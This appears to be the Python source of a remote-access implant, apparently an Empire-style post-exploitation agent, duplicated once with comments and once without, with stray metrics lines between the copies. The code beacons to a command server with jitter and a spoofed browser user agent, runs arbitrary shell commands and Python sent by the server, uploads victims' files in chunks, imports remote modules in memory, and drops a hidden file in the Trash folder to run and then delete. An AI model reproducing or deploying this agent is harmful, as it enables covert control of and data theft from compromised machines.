finder = _meta_cache.pop(repoName)
sys.meta_path.remove(finder)
################################################
#
# misc methods
#
################################################
class compress(object):
'''
    Base class for the package. Handles the initial
    object creation for basic compression functions.
'''
CRC_HSIZE = 4
COMP_RATIO = 9
def __init__(self, verbose=False):
"""
Populates init.
"""
pass
def comp_data(self, data, cvalue=COMP_RATIO):
'''
        Takes in a byte string and returns
        the zlib-compressed bytes.
        data = byte string to compress
        cvalue = 0-9 compression level (default 9)
'''
cdata = zlib.compress(data, cvalue)
return cdata
def crc32_data(self, data):
'''
        Takes in a byte string and computes its crc32 value.
        data = byte string before compression
        returns:
            unsigned 32-bit integer CRC of the data
'''
crc = zlib.crc32(data) & 0xFFFFFFFF
return crc
def build_header(self, data, crc):
'''
Takes comp data, org crc32 value,
and adds self header.
data = comp data
crc = crc32 value
'''
header = struct.pack("!I", crc)
built_data = header + data
return built_data
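# Wire-format sketch: build_header() prepends a 4-byte big-endian CRC32
# ("!I") of the original, uncompressed data to the zlib stream so the
# receiver can verify integrity after decompression:
#   c = compress()
#   blob = c.build_header(c.comp_data(raw), c.crc32_data(raw))  # raw: bytes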
class decompress(object):
'''
    Base class for the package. Handles the initial
    object creation for basic decompression functions.
'''
CRC_HSIZE = 4
COMP_RATIO = 9
def __init__(self, verbose=False):
"""
Populates init.
"""
pass
def dec_data(self, data, cheader=True):
'''
Takes:
Custom / standard header data
data = comp data with zlib header
BOOL cheader = passing custom crc32 header
returns:
            dict with the crc32 check and decompressed data
            ex. {"crc32_check": True, "data": b"-SNIP-"}
'''
if cheader:
comp_crc32 = struct.unpack("!I", data[:self.CRC_HSIZE])[0]
dec_data = zlib.decompress(data[self.CRC_HSIZE:])
dec_crc32 = zlib.crc32(dec_data) & 0xFFFFFFFF
if comp_crc32 == dec_crc32:
crc32 = True
else:
crc32 = False
return {"header_crc32": comp_crc32, "dec_crc32": dec_crc32, "crc32_check": crc32, "data": dec_data}
else:
dec_data = zlib.decompress(data)
return dec_data
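# Round-trip sketch against the compress class above (raw: bytes):
#   d = decompress()
#   out = d.dec_data(blob, cheader=True)
#   assert out['crc32_check'] and out['data'] == raw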
def agent_exit():
# exit for proper job / thread cleanup
if len(jobs) > 0:
try:
for x in jobs:
jobs[int(x)].kill()
jobs.pop(x)
except:
# die hard if thread kill fails
pass
exit()
def indent(lines, amount=4, ch=' '):
padding = amount * ch
return padding + ('\n' + padding).join(lines.split('\n'))
# from http://stackoverflow.com/questions/6893968/how-to-get-the-return-value-from-a-thread-in-python
class ThreadWithReturnValue(Thread):
    def __init__(self, group=None, target=None, name=None,
                 args=(), kwargs={}):
        Thread.__init__(self, group, target, name, args, kwargs)
self._return = None
def run(self):
        if self._target is not None:
            self._return = self._target(*self._args,
                                        **self._kwargs)
def join(self):
Thread.join(self)
return self._return
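# Usage sketch: t = ThreadWithReturnValue(target=f, args=(x,)); t.start()
# value = t.join()   # join() hands back f's return value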
class KThread(threading.Thread):
"""A subclass of threading.Thread, with a kill()
method."""
def __init__(self, *args, **keywords):
threading.Thread.__init__(self, *args, **keywords)
self.killed = False
def start(self):
"""Start the thread."""
self.__run_backup = self.run
        self.run = self.__run  # Force the Thread to install our trace.
threading.Thread.start(self)
def __run(self):
"""Hacked run function, which installs the
trace."""
sys.settrace(self.globaltrace)
self.__run_backup()
self.run = self.__run_backup
def globaltrace(self, frame, why, arg):
if why == 'call':
return self.localtrace
else:
return None
def localtrace(self, frame, why, arg):
if self.killed:
if why == 'line':
raise SystemExit()
return self.localtrace
def kill(self):
self.killed = True
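# Usage sketch: kt = KThread(target=busy_loop); kt.start(); kt.kill()
# The kill only lands on the thread's next 'line' trace event, so a thread
# blocked inside a C call (e.g. a long sleep) dies only after it returns.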
def start_job(code, resultID):
global jobs
# create a new code block with a defined method name
codeBlock = "def method():\n" + indent(code[1:])
# register the code block
code_obj = compile(codeBlock, '<string>', 'exec')
# code needs to be in the global listing
# not the locals() scope
exec(code_obj, globals())
# create/process Packet start/return the thread
# call the job_func so sys data can be captured
codeThread = KThread(target=job_func, args=(resultID,))
codeThread.start()
jobs.append(codeThread)
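# Wrapping sketch: code[1:] drops the leading character (a newline by
# convention), so a tasked script "\nprint('hi')" becomes
#   def method():
#       print('hi')
# which is exec'd into globals() and run on a killable KThread.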
def job_func(resultID):
try:
buffer = StringIO()
sys.stdout = buffer
# now call the function required
# and capture the output via sys
method()
sys.stdout = sys.__stdout__
dataStats_2 = buffer.getvalue()
result = build_response_packet(110, str(dataStats_2), resultID)
process_job_tasking(result)
except Exception as e:
p = "error executing specified Python job data: " + str(e)
result = build_response_packet(0, p, resultID)
process_job_tasking(result)
def job_message_buffer(message):
# Supports job messages for checkin
global jobMessageBuffer
try:
jobMessageBuffer += str(message)
except Exception as e:
print(e)
def get_job_message_buffer():
global jobMessageBuffer
try:
result = build_response_packet(110, str(jobMessageBuffer))
jobMessageBuffer = ""
return result
except Exception as e:
return build_response_packet(0, "[!] Error getting job output: %s" % (e))
def send_job_message_buffer():
if len(jobs) > 0:
result = get_job_message_buffer()
process_job_tasking(result)
else:
pass
def start_webserver(data, ip, port, serveCount):
# thread data_webserver for execution
t = threading.Thread(target=data_webserver, args=(data, ip, port, serveCount))
t.start()
return
def data_webserver(data, ip, port, serveCount):
# hosts a file on port and IP servers data string
hostName = str(ip)
portNumber = int(port)
data = str(data)
serveCount = int(serveCount)
count = 0
class serverHandler(http.server.BaseHTTPRequestHandler):
def do_GET(s):
"""Respond to a GET request."""
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
            s.wfile.write(data.encode('UTF-8'))
def log_message(s, format, *args):
return
server_class = http.server.HTTPServer
httpServer = server_class((hostName, portNumber), serverHandler)
try:
while (count < serveCount):
httpServer.handle_request()
count += 1
except:
pass
httpServer.server_close()
return
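# Usage sketch: start_webserver('payload', '0.0.0.0', 8080, 1) answers a
# single GET with the string and then shuts the server down.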
def permissions_to_unix_name(st_mode):
permstr = ''
usertypes = ['USR', 'GRP', 'OTH']
for usertype in usertypes:
perm_types = ['R', 'W', 'X']
for permtype in perm_types:
perm = getattr(stat, 'S_I%s%s' % (permtype, usertype))
if st_mode & perm:
permstr += permtype.lower()
else:
permstr += '-'
return permstr
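# e.g. permissions_to_unix_name(0o754) -> 'rwxr-xr--' (the caller prepends
# the d/- file-type flag).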
def directory_listing(path):
# directory listings in python
# https://www.opentechguides.com/how-to/article/python/78/directory-file-list.html
res = ""
for fn in os.listdir(path):
fstat = os.stat(os.path.join(path, fn))
permstr = permissions_to_unix_name(fstat[0])
if os.path.isdir(fn):
permstr = "d{}".format(permstr)
else:
permstr = "-{}".format(permstr)
user = pwd.getpwuid(fstat.st_uid)[0]
group = grp.getgrgid(fstat.st_gid)[0]
# Convert file size to MB, KB or Bytes
if (fstat.st_size > 1024 * 1024):
fsize = math.ceil(old_div(fstat.st_size, (1024 * 1024)))
unit = "MB"
elif (fstat.st_size > 1024):
fsize = math.ceil(old_div(fstat.st_size, 1024))
unit = "KB"
else:
fsize = fstat.st_size
unit = "B"
mtime = time.strftime("%X %x", time.gmtime(fstat.st_mtime))
res += '{} {} {} {:18s} {:f} {:2s} {:15.15s}\n'.format(permstr, user, group, mtime, fsize, unit, fn)
return res
# additional implementation methods
def run_command(command, cmdargs=None):
if re.compile("(ls|dir)").match(command):
if cmdargs == None or not os.path.exists(cmdargs):
cmdargs = '.'
return directory_listing(cmdargs)
if re.compile("cd").match(command):
os.chdir(cmdargs)
return str(os.getcwd())
elif re.compile("pwd").match(command):
return str(os.getcwd())
elif re.compile("rm").match(command):
if cmdargs == None:
return "please provide a file or directory"
if os.path.exists(cmdargs):
if os.path.isfile(cmdargs):
os.remove(cmdargs)
return "done."
elif os.path.isdir(cmdargs):
shutil.rmtree(cmdargs)
return "done."
else:
return "unsupported file type"
else:
return "specified file/directory does not exist"
elif re.compile("mkdir").match(command):
if cmdargs == None:
return "please provide a directory"
os.mkdir(cmdargs)
return "Created directory: {}".format(cmdargs)
elif re.compile("(whoami|getuid)").match(command):
return pwd.getpwuid(os.getuid())[0]
elif re.compile("hostname").match(command):
return str(socket.gethostname())
else:
if cmdargs != None:
command = "{} {}".format(command, cmdargs)
p = subprocess.Popen(command, stdin=None, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True)
return p.communicate()[0].strip().decode('UTF-8')
def get_file_part(filePath, offset=0, chunkSize=512000, base64=True):
if not os.path.exists(filePath):
return ''
f = open(filePath, 'rb')
f.seek(offset, 0)
data = f.read(chunkSize)
f.close()
if base64:
return base64.b64encode(data)
else:
return data
################################################
#
# main agent functionality
#
################################################
while (True):
try:
if workingHours != '' and 'WORKINGHOURS' not in workingHours:
try:
start, end = workingHours.split('-')
now = datetime.datetime.now()
startTime = datetime.datetime.strptime(start, "%H:%M")
endTime = datetime.datetime.strptime(end, "%H:%M")
if not (startTime <= now <= endTime):
sleepTime = startTime - now
# sleep until the start of the next window
time.sleep(sleepTime.seconds)
except Exception as e:
pass
# check if we're past the killdate for this agent
# killDate form -> MO/DAY/YEAR
if killDate != "" and 'KILLDATE' not in killDate:
now = datetime.datetime.now().date()
try:
killDateTime = datetime.datetime.strptime(killDate, "%m/%d/%Y").date()
except:
pass
if now >= killDateTime:
msg = "[!] Agent %s exiting" % (sessionID)
send_message(build_response_packet(2, msg))
agent_exit()
        # exit if we miss communicating with the server enough times
if missedCheckins >= lostLimit:
agent_exit()
# sleep for the randomized interval
if jitter < 0: jitter = -jitter
if jitter > 1: jitter = old_div(1, jitter)
minSleep = int((1.0 - jitter) * delay)
maxSleep = int((1.0 + jitter) * delay)
sleepTime = random.randint(minSleep, maxSleep)
time.sleep(sleepTime)
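        # e.g. delay=60, jitter=0.5 -> a uniform sleep in [30, 90] seconds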
(code, data) = send_message()
if code == '200':
try:
send_job_message_buffer()
except Exception as e:
result = build_response_packet(0, str('[!] Failed to check job buffer!: ' + str(e)))
process_job_tasking(result)
if data.strip() == defaultResponse.strip():
missedCheckins = 0
else:
decode_routing_packet(data)
else:
pass
# print "invalid code:",code
except Exception as e:
print("main() exception: %s" % (e))
| 33.6215
| 151
| 0.563422
|
import json
import struct
import base64
import subprocess
import random
import time
import datetime
import os
import sys
import zlib
import threading
import http.server
import zipfile
import io
import types
import re
import shutil
import pwd
import socket
import math
import stat
import grp
import numbers
from os.path import expanduser
from io import StringIO
from threading import Thread
profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
if server.endswith("/"): server = server[0:-1]
delay = 60
jitter = 0.0
lostLimit = 60
missedCheckins = 0
jobMessageBuffer = ''
currentListenerName = ""
sendMsgFuncCode = ""
proxy_list = []
killDate = 'REPLACE_KILLDATE'
workingHours = 'REPLACE_WORKINGHOURS'
parts = profile.split('|')
taskURIs = parts[0].split(',')
userAgent = parts[1]
headersRaw = parts[2:]
defaultResponse = base64.b64decode("")
jobs = []
moduleRepo = {}
_meta_cache = {}
headers = {'User-Agent': userAgent}
for headerRaw in headersRaw:
try:
headerKey = headerRaw.split(":")[0]
headerValue = headerRaw.split(":")[1]
if headerKey.lower() == "cookie":
headers['Cookie'] = "%s;%s" % (headers['Cookie'], headerValue)
else:
headers[headerKey] = headerValue
except:
pass
REPLACE_COMMS
def decode_routing_packet(data):
packets = parse_routing_packet(stagingKey, data)
if packets is None:
return
for agentID, packet in packets.items():
if agentID == sessionID:
(language, meta, additional, encData) = packet
process_tasking(encData)
else:
pass
def build_response_packet(taskingID, packetData, resultID=0):
packetType = struct.pack('=H', taskingID)
totalPacket = struct.pack('=H', 1)
packetNum = struct.pack('=H', 1)
resultID = struct.pack('=H', resultID)
if packetData:
if (isinstance(packetData, str)):
packetData = base64.b64encode(packetData.encode('utf-8', 'ignore'))
else:
packetData = base64.b64encode(packetData.decode('utf-8').encode('utf-8', 'ignore'))
if len(packetData) % 4:
            packetData += b'=' * (4 - len(packetData) % 4)
length = struct.pack('=L', len(packetData))
return packetType + totalPacket + packetNum + resultID + length + packetData
else:
length = struct.pack('=L', 0)
return packetType + totalPacket + packetNum + resultID + length
def parse_task_packet(packet, offset=0):
try:
packetType = struct.unpack('=H', packet[0 + offset:2 + offset])[0]
totalPacket = struct.unpack('=H', packet[2 + offset:4 + offset])[0]
packetNum = struct.unpack('=H', packet[4 + offset:6 + offset])[0]
resultID = struct.unpack('=H', packet[6 + offset:8 + offset])[0]
length = struct.unpack('=L', packet[8 + offset:12 + offset])[0]
packetData = packet[12 + offset:12 + offset + length].decode('UTF-8')
remainingData = packet[12 + offset + length:].decode('UTF-8')
return (packetType, totalPacket, packetNum, resultID, length, packetData, remainingData)
except Exception as e:
print("parse_task_packet exception:", e)
return (None, None, None, None, None, None, None)
def process_tasking(data):
try:
tasking = aes_decrypt_and_verify(key, data).encode('UTF-8')
(packetType, totalPacket, packetNum, resultID, length, data, remainingData) = parse_task_packet(tasking)
missedCheckins = 0
resultPackets = ""
result = process_packet(packetType, data, resultID)
if result:
resultPackets += result
packetOffset = 12 + length
while remainingData and remainingData != '':
(packetType, totalPacket, packetNum, resultID, length, data, remainingData) = parse_task_packet(tasking,
offset=packetOffset)
result = process_packet(packetType, data, resultID)
if result:
resultPackets += result
packetOffset += 12 + length
send_message(resultPackets)
except Exception as e:
pass
def process_job_tasking(result):
try:
resultPackets = b""
if result:
resultPackets += result
send_message(resultPackets)
except Exception as e:
print("processJobTasking exception:", e)
pass
def process_packet(packetType, data, resultID):
try:
packetType = int(packetType)
except Exception as e:
return None
if packetType == 1:
send_message(build_response_packet(1, get_sysinfo(), resultID))
elif packetType == 2:
send_message(build_response_packet(2, "", resultID))
agent_exit()
elif packetType == 34:
proxy_list = json.loads(data)
update_proxychain(proxy_list)
elif packetType == 40:
parts = data.split(" ")
if len(parts) == 1:
data = parts[0]
resultData = str(run_command(data))
send_message(build_response_packet(40, resultData, resultID))
else:
cmd = parts[0]
cmdargs = ' '.join(parts[1:len(parts)])
resultData = str(run_command(cmd, cmdargs=cmdargs))
send_message(build_response_packet(40, resultData, resultID))
elif packetType == 41:
objPath = os.path.abspath(data)
fileList = []
if not os.path.exists(objPath):
send_message(build_response_packet(40, "file does not exist or cannot be accessed", resultID))
if not os.path.isdir(objPath):
fileList.append(objPath)
else:
for folder, subs, files in os.walk(objPath):
for filename in files:
if os.path.exists(objPath):
fileList.append(objPath + "/" + filename)
for filePath in fileList:
offset = 0
size = os.path.getsize(filePath)
partIndex = 0
while True:
encodedPart = get_file_part(filePath, offset=offset, base64=False)
c = compress()
start_crc32 = c.crc32_data(encodedPart)
comp_data = c.comp_data(encodedPart)
encodedPart = c.build_header(comp_data, start_crc32)
encodedPart = base64.b64encode(encodedPart).decode('UTF-8')
partData = "%s|%s|%s|%s" % (partIndex, filePath, size, encodedPart)
if not encodedPart or encodedPart == '' or len(encodedPart) == 16:
break
send_message(build_response_packet(41, partData, resultID))
global delay
global jitter
if jitter < 0: jitter = -jitter
if jitter > 1: jitter = old_div(1, jitter)
minSleep = int((1.0 - jitter) * delay)
maxSleep = int((1.0 + jitter) * delay)
sleepTime = random.randint(minSleep, maxSleep)
time.sleep(sleepTime)
partIndex += 1
offset += 512000
elif packetType == 42:
try:
parts = data.split("|")
filePath = parts[0]
base64part = parts[1]
raw = base64.b64decode(base64part)
with open(filePath, 'ab') as f:
f.write(raw)
send_message(build_response_packet(42, "[*] Upload of %s successful" % (filePath), resultID))
except Exception as e:
send_message(build_response_packet(0, "[!] Error in writing file %s during upload: %s" % (filePath, str(e)), resultID))
elif packetType == 43:
cmdargs = data
        path = '/'
        if cmdargs is not None and cmdargs != '' and cmdargs != '/': path = cmdargs.rstrip('/')
if path[0] != '/': path = '/{0}'.format(path)
if not os.path.isdir(path):
send_message(build_response_packet(43, 'Directory {} not found.'.format(path), resultID))
items = []
with os.scandir(path) as it:
for entry in it:
items.append({'path': entry.path, 'name': entry.name, 'is_file': entry.is_file()})
result_data = json.dumps({
'directory_name': path if len(path) == 1 else path.split('/')[-1],
'directory_path': path,
'items': items
})
send_message(build_response_packet(43, result_data, resultID))
elif packetType == 50:
msg = ""
if len(jobs) == 0:
msg = "No active jobs"
else:
msg = "Active jobs:\n"
for x in range(len(jobs)):
msg += "\t%s" % (x)
send_message(build_response_packet(50, msg, resultID))
elif packetType == 51:
try:
# Calling join first seems to hang
# result = jobs[int(data)].join()
send_message(build_response_packet(0, "[*] Attempting to stop job thread", resultID))
result = jobs[int(data)].kill()
send_message(build_response_packet(0, "[*] Job thread stoped!", resultID))
jobs.pop(int(data))
if result and result != "":
send_message(build_response_packet(51, result, resultID))
except:
return build_response_packet(0, "error stopping job: %s" % (data), resultID)
elif packetType == 100:
        # dynamic code execution, wait for output, don't save output
try:
buffer = StringIO()
sys.stdout = buffer
code_obj = compile(data, '<string>', 'exec')
exec(code_obj, globals())
sys.stdout = sys.__stdout__
results = buffer.getvalue()
send_message(build_response_packet(100, str(results), resultID))
except Exception as e:
errorData = str(buffer.getvalue())
return build_response_packet(0, "error executing specified Python data: %s \nBuffer data recovered:\n%s" % (
e, errorData), resultID)
elif packetType == 101:
prefix = data[0:15].strip()
extension = data[15:20].strip()
data = data[20:]
try:
buffer = StringIO()
sys.stdout = buffer
code_obj = compile(data, '<string>', 'exec')
exec(code_obj, globals())
sys.stdout = sys.__stdout__
results = buffer.getvalue().encode('latin-1')
c = compress()
start_crc32 = c.crc32_data(results)
comp_data = c.comp_data(results)
encodedPart = c.build_header(comp_data, start_crc32)
encodedPart = base64.b64encode(encodedPart).decode('UTF-8')
send_message(
build_response_packet(101, '{0: <15}'.format(prefix) + '{0: <5}'.format(extension) + encodedPart,
resultID))
except Exception as e:
errorData = buffer.getvalue()
send_message(build_response_packet(0,
"error executing specified Python data %s \nBuffer data recovered:\n%s" % (
e, errorData), resultID))
elif packetType == 102:
try:
implantHome = expanduser("~") + '/.Trash/'
moduleName = ".mac-debug-data"
implantPath = implantHome + moduleName
result = "[*] Module disk path: %s \n" % (implantPath)
with open(implantPath, 'w') as f:
f.write(data)
result += "[*] Module properly dropped to disk \n"
pythonCommand = "python %s" % (implantPath)
process = subprocess.Popen(pythonCommand, stdout=subprocess.PIPE, shell=True)
data = process.communicate()
            result += data[0].strip().decode('UTF-8')
try:
os.remove(implantPath)
result += "[*] Module path was properly removed: %s" % (implantPath)
except Exception as e:
print("error removing module filed: %s" % (e))
fileCheck = os.path.isfile(implantPath)
if fileCheck:
result += "\n\nError removing module file, please verify path: " + str(implantPath)
send_message(build_response_packet(100, str(result), resultID))
except Exception as e:
fileCheck = os.path.isfile(implantPath)
if fileCheck:
send_message(build_response_packet(0,
"error executing specified Python data: %s \nError removing module file, please verify path: %s" % (
e, implantPath), resultID))
send_message(build_response_packet(0, "error executing specified Python data: %s" % (e), resultID))
elif packetType == 110:
start_job(data, resultID)
elif packetType == 111:
pass
elif packetType == 121:
script = base64.b64decode(data)
try:
buffer = StringIO()
sys.stdout = buffer
code_obj = compile(script, '<string>', 'exec')
exec(code_obj, globals())
sys.stdout = sys.__stdout__
result = str(buffer.getvalue())
send_message(build_response_packet(121, result, resultID))
except Exception as e:
errorData = str(buffer.getvalue())
send_message(build_response_packet(0,
"error executing specified Python data %s \nBuffer data recovered:\n%s" % (
e, errorData), resultID))
elif packetType == 122:
try:
parts = data.split('|')
base64part = parts[1]
fileName = parts[0]
raw = base64.b64decode(base64part)
d = decompress()
dec_data = d.dec_data(raw, cheader=True)
if not dec_data['crc32_check']:
send_message(build_response_packet(122, "Failed crc32_check during decompression", resultID))
except Exception as e:
send_message(build_response_packet(122, "Unable to decompress zip file: %s" % (e), resultID))
zdata = dec_data['data']
zf = zipfile.ZipFile(io.BytesIO(zdata), "r")
if fileName in list(moduleRepo.keys()):
send_message(build_response_packet(122, "%s module already exists" % (fileName), resultID))
else:
moduleRepo[fileName] = zf
install_hook(fileName)
send_message(build_response_packet(122, "Successfully imported %s" % (fileName), resultID))
elif packetType == 123:
repoName = data
if repoName == "":
loadedModules = "\nAll Repos\n"
for key, value in list(moduleRepo.items()):
loadedModules += "\n----" + key + "----\n"
loadedModules += '\n'.join(moduleRepo[key].namelist())
send_message(build_response_packet(123, loadedModules, resultID))
else:
try:
loadedModules = "\n----" + repoName + "----\n"
loadedModules += '\n'.join(moduleRepo[repoName].namelist())
send_message(build_response_packet(123, loadedModules, resultID))
except Exception as e:
msg = "Unable to retrieve repo contents: %s" % (str(e))
send_message(build_response_packet(123, msg, resultID))
elif packetType == 124:
repoName = data
try:
remove_hook(repoName)
del moduleRepo[repoName]
send_message(build_response_packet(124, "Successfully remove repo: %s" % (repoName), resultID))
except Exception as e:
send_message(build_response_packet(124, "Unable to remove repo: %s, %s" % (repoName, str(e)), resultID))
else:
send_message(build_response_packet(0, "invalid tasking ID: %s" % (taskingID), resultID))
def old_div(a, b):
if isinstance(a, numbers.Integral) and isinstance(b, numbers.Integral):
return a // b
else:
return a / b
_search_order = [('.py', False), ('/__init__.py', True)]
class ZipImportError(ImportError):
    pass
class CFinder(object):
def __init__(self, repoName):
self.repoName = repoName
def _get_info(self, repoName, fullname):
parts = fullname.split('.')
submodule = parts[-1]
modulepath = '/'.join(parts)
for suffix, is_package in _search_order:
relpath = modulepath + suffix
try:
moduleRepo[repoName].getinfo(relpath)
except KeyError:
pass
else:
return submodule, is_package, relpath
msg = ('Unable to locate module %s in the %s repo' % (submodule, repoName))
raise ZipImportError(msg)
def _get_source(self, repoName, fullname):
submodule, is_package, relpath = self._get_info(repoName, fullname)
fullpath = '%s/%s' % (repoName, relpath)
source = moduleRepo[repoName].read(relpath)
source = source.replace('\r\n', '\n')
source = source.replace('\r', '\n')
return submodule, is_package, fullpath, source
def find_module(self, fullname, path=None):
try:
submodule, is_package, relpath = self._get_info(self.repoName, fullname)
except ImportError:
return None
else:
return self
def load_module(self, fullname):
submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname)
code = compile(source, fullpath, 'exec')
mod = sys.modules.setdefault(fullname, types.ModuleType(fullname))
mod.__loader__ = self
mod.__file__ = fullpath
mod.__name__ = fullname
if is_package:
mod.__path__ = [os.path.dirname(mod.__file__)]
exec(code, mod.__dict__)
return mod
def get_data(self, fullpath):
prefix = os.path.join(self.repoName, '')
if not fullpath.startswith(prefix):
            raise IOError('Path %r does not start with module name %r' % (fullpath, prefix))
relpath = fullpath[len(prefix):]
try:
return moduleRepo[self.repoName].read(relpath)
except KeyError:
raise IOError('Path %r not found in repo %r' % (relpath, self.repoName))
def is_package(self, fullname):
submodule, is_package, relpath = self._get_info(self.repoName, fullname)
return is_package
def get_code(self, fullname):
submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname)
return compile(source, fullpath, 'exec')
def install_hook(repoName):
if repoName not in _meta_cache:
finder = CFinder(repoName)
_meta_cache[repoName] = finder
sys.meta_path.append(finder)
def remove_hook(repoName):
if repoName in _meta_cache:
finder = _meta_cache.pop(repoName)
sys.meta_path.remove(finder)
class compress(object):
CRC_HSIZE = 4
COMP_RATIO = 9
def __init__(self, verbose=False):
pass
def comp_data(self, data, cvalue=COMP_RATIO):
cdata = zlib.compress(data, cvalue)
return cdata
def crc32_data(self, data):
crc = zlib.crc32(data) & 0xFFFFFFFF
return crc
def build_header(self, data, crc):
header = struct.pack("!I", crc)
built_data = header + data
return built_data
class decompress(object):
CRC_HSIZE = 4
COMP_RATIO = 9
def __init__(self, verbose=False):
pass
def dec_data(self, data, cheader=True):
if cheader:
comp_crc32 = struct.unpack("!I", data[:self.CRC_HSIZE])[0]
dec_data = zlib.decompress(data[self.CRC_HSIZE:])
dec_crc32 = zlib.crc32(dec_data) & 0xFFFFFFFF
if comp_crc32 == dec_crc32:
crc32 = True
else:
crc32 = False
return {"header_crc32": comp_crc32, "dec_crc32": dec_crc32, "crc32_check": crc32, "data": dec_data}
else:
dec_data = zlib.decompress(data)
return dec_data
def agent_exit():
if len(jobs) > 0:
try:
for x in jobs:
jobs[int(x)].kill()
jobs.pop(x)
except:
pass
exit()
def indent(lines, amount=4, ch=' '):
padding = amount * ch
return padding + ('\n' + padding).join(lines.split('\n'))
class ThreadWithReturnValue(Thread):
    def __init__(self, group=None, target=None, name=None,
                 args=(), kwargs={}):
        Thread.__init__(self, group, target, name, args, kwargs)
self._return = None
def run(self):
        if self._target is not None:
            self._return = self._target(*self._args,
                                        **self._kwargs)
def join(self):
Thread.join(self)
return self._return
class KThread(threading.Thread):
def __init__(self, *args, **keywords):
threading.Thread.__init__(self, *args, **keywords)
self.killed = False
def start(self):
self.__run_backup = self.run
        self.run = self.__run
        threading.Thread.start(self)
def __run(self):
sys.settrace(self.globaltrace)
self.__run_backup()
self.run = self.__run_backup
def globaltrace(self, frame, why, arg):
if why == 'call':
return self.localtrace
else:
return None
def localtrace(self, frame, why, arg):
if self.killed:
if why == 'line':
raise SystemExit()
return self.localtrace
def kill(self):
self.killed = True
def start_job(code, resultID):
global jobs
codeBlock = "def method():\n" + indent(code[1:])
code_obj = compile(codeBlock, '<string>', 'exec')
exec(code_obj, globals())
codeThread = KThread(target=job_func, args=(resultID,))
codeThread.start()
jobs.append(codeThread)
def job_func(resultID):
try:
buffer = StringIO()
sys.stdout = buffer
method()
sys.stdout = sys.__stdout__
dataStats_2 = buffer.getvalue()
result = build_response_packet(110, str(dataStats_2), resultID)
process_job_tasking(result)
except Exception as e:
p = "error executing specified Python job data: " + str(e)
result = build_response_packet(0, p, resultID)
process_job_tasking(result)
def job_message_buffer(message):
global jobMessageBuffer
try:
jobMessageBuffer += str(message)
except Exception as e:
print(e)
def get_job_message_buffer():
global jobMessageBuffer
try:
result = build_response_packet(110, str(jobMessageBuffer))
jobMessageBuffer = ""
return result
except Exception as e:
return build_response_packet(0, "[!] Error getting job output: %s" % (e))
def send_job_message_buffer():
if len(jobs) > 0:
result = get_job_message_buffer()
process_job_tasking(result)
else:
pass
def start_webserver(data, ip, port, serveCount):
t = threading.Thread(target=data_webserver, args=(data, ip, port, serveCount))
t.start()
return
def data_webserver(data, ip, port, serveCount):
hostName = str(ip)
portNumber = int(port)
data = str(data)
serveCount = int(serveCount)
count = 0
class serverHandler(http.server.BaseHTTPRequestHandler):
def do_GET(s):
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
            s.wfile.write(data.encode('UTF-8'))
def log_message(s, format, *args):
return
server_class = http.server.HTTPServer
httpServer = server_class((hostName, portNumber), serverHandler)
try:
while (count < serveCount):
httpServer.handle_request()
count += 1
except:
pass
httpServer.server_close()
return
def permissions_to_unix_name(st_mode):
permstr = ''
usertypes = ['USR', 'GRP', 'OTH']
for usertype in usertypes:
perm_types = ['R', 'W', 'X']
for permtype in perm_types:
perm = getattr(stat, 'S_I%s%s' % (permtype, usertype))
if st_mode & perm:
permstr += permtype.lower()
else:
permstr += '-'
return permstr
def directory_listing(path):
res = ""
for fn in os.listdir(path):
fstat = os.stat(os.path.join(path, fn))
permstr = permissions_to_unix_name(fstat[0])
if os.path.isdir(fn):
permstr = "d{}".format(permstr)
else:
permstr = "-{}".format(permstr)
user = pwd.getpwuid(fstat.st_uid)[0]
group = grp.getgrgid(fstat.st_gid)[0]
if (fstat.st_size > 1024 * 1024):
fsize = math.ceil(old_div(fstat.st_size, (1024 * 1024)))
unit = "MB"
elif (fstat.st_size > 1024):
fsize = math.ceil(old_div(fstat.st_size, 1024))
unit = "KB"
else:
fsize = fstat.st_size
unit = "B"
mtime = time.strftime("%X %x", time.gmtime(fstat.st_mtime))
res += '{} {} {} {:18s} {:f} {:2s} {:15.15s}\n'.format(permstr, user, group, mtime, fsize, unit, fn)
return res
def run_command(command, cmdargs=None):
if re.compile("(ls|dir)").match(command):
if cmdargs == None or not os.path.exists(cmdargs):
cmdargs = '.'
return directory_listing(cmdargs)
if re.compile("cd").match(command):
os.chdir(cmdargs)
return str(os.getcwd())
elif re.compile("pwd").match(command):
return str(os.getcwd())
elif re.compile("rm").match(command):
if cmdargs == None:
return "please provide a file or directory"
if os.path.exists(cmdargs):
if os.path.isfile(cmdargs):
os.remove(cmdargs)
return "done."
elif os.path.isdir(cmdargs):
shutil.rmtree(cmdargs)
return "done."
else:
return "unsupported file type"
else:
return "specified file/directory does not exist"
elif re.compile("mkdir").match(command):
if cmdargs == None:
return "please provide a directory"
os.mkdir(cmdargs)
return "Created directory: {}".format(cmdargs)
elif re.compile("(whoami|getuid)").match(command):
return pwd.getpwuid(os.getuid())[0]
elif re.compile("hostname").match(command):
return str(socket.gethostname())
else:
if cmdargs != None:
command = "{} {}".format(command, cmdargs)
p = subprocess.Popen(command, stdin=None, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True)
return p.communicate()[0].strip().decode('UTF-8')
def get_file_part(filePath, offset=0, chunkSize=512000, base64=True):
if not os.path.exists(filePath):
return ''
f = open(filePath, 'rb')
f.seek(offset, 0)
data = f.read(chunkSize)
f.close()
if base64:
return base64.b64encode(data)
else:
return data
while (True):
try:
if workingHours != '' and 'WORKINGHOURS' not in workingHours:
try:
start, end = workingHours.split('-')
now = datetime.datetime.now()
startTime = datetime.datetime.strptime(start, "%H:%M")
endTime = datetime.datetime.strptime(end, "%H:%M")
if not (startTime <= now <= endTime):
sleepTime = startTime - now
time.sleep(sleepTime.seconds)
except Exception as e:
pass
# killDate form -> MO/DAY/YEAR
if killDate != "" and 'KILLDATE' not in killDate:
now = datetime.datetime.now().date()
try:
killDateTime = datetime.datetime.strptime(killDate, "%m/%d/%Y").date()
except:
pass
if now >= killDateTime:
msg = "[!] Agent %s exiting" % (sessionID)
send_message(build_response_packet(2, msg))
agent_exit()
        # exit if we miss communicating with the server enough times
if missedCheckins >= lostLimit:
agent_exit()
# sleep for the randomized interval
if jitter < 0: jitter = -jitter
if jitter > 1: jitter = old_div(1, jitter)
